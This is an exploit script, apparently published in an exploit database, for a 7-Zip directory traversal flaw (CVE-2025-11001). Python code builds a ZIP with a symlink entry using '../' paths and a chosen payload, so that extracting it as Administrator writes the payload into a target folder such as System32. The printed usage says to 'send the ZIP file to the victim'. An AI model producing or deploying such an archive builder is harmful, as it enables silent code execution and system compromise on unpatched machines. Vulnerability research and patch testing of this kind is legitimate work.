# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP 
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions

import struct
import os
import argparse
import sys

def build_zip(target_path, payload_file, output_zip):
    if not os.path.isfile(payload_file):
        print(f"[-] Payload file not found: {payload_file}")
        sys.exit(1)

    payload_name = os.path.basename(payload_file)
    payload_data = open(payload_file, "rb").read()

    target = target_path.replace("\\", "/").strip("/") + "/"
    traversal = "../../../../" + target

    with open(output_zip, "wb") as f:
        offset = 0

        symlink_name = "evil.lnk"
        symlink_target = traversal.encode() + b"\x00"
        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target

        symlink_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra))

        f.write(symlink_header)
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(b"")
        symlink_central_offset = offset
        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)

        payload_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0)

        f.write(payload_header)
        f.write(payload_name.encode())
        f.write(payload_data)
        payload_central_offset = offset
        offset += len(payload_header) + len(payload_name) + len(payload_data)

        cd_offset = offset

        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
        f.write(symlink_name.encode())
        f.write(symlink_extra)

        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
        f.write(payload_name.encode())

        f.write(struct.pack("<IHHHHIIH",
            0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))

    print(f"[+] Malicious archive created: {output_zip}")
    print(f"[+] Target path          : {target_path}")
    print(f"[+] Payload file         : {payload_name} ({len(payload_data)} bytes)")
    print(f"[+] Final write location : {target_path}\\{payload_name}")
    print("\n[*] Usage:")
    print("    1. Send the ZIP file to the victim")
    print("    2. Victim must run 7-Zip < 25.00 as Administrator")
    print("    3. Victim opens and extracts the ZIP → payload dropped silently")
    print("    4. Achievement unlocked")

if __name__ == "__main__":
    banner = """
    CVE-2025-11001 - 7-Zip Directory Traversal PoC
    Author: Mohammed Idrees Banyamer (@banyamer_security)
    """
    print(banner)

    parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
    parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
    parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
    parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")

    args = parser.parse_args()

    build_zip(args.target, args.payload, args.output)